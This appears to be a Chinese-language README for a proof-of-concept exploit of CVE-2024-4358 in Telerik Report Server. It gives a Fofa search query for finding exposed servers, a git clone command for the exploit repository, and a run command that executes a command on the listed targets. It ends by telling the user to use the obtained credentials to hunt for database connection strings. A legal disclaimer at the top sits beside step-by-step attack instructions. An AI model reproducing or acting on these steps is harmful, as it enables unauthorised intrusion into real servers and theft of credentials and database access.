免责声明:本概念验证(POC)仅供教育和道德测试目的使用。在未事先获得双方同意的情况下,使用此工具攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对因使用本程序造成的任何滥用或损害负责。
要查找潜在目标,请使用 Fofa(类似于 Shodan.io):
title="Telerik Report Server"首先,克隆仓库:
git clone https://github.com/fa-rrel/CVE-2024-4358/
接下来,选择你的目标,并将其以如下格式添加到 urls.txt 文件中:
运行漏洞利用程序:
python3 CVE-2024-4358.py -l urls.txt -c id -t 10
结果文件 results.txt 将保存在文件夹中。现在你只需要使用获取的凭据进行连接,并查找有趣的连接字符串,以便登录数据库。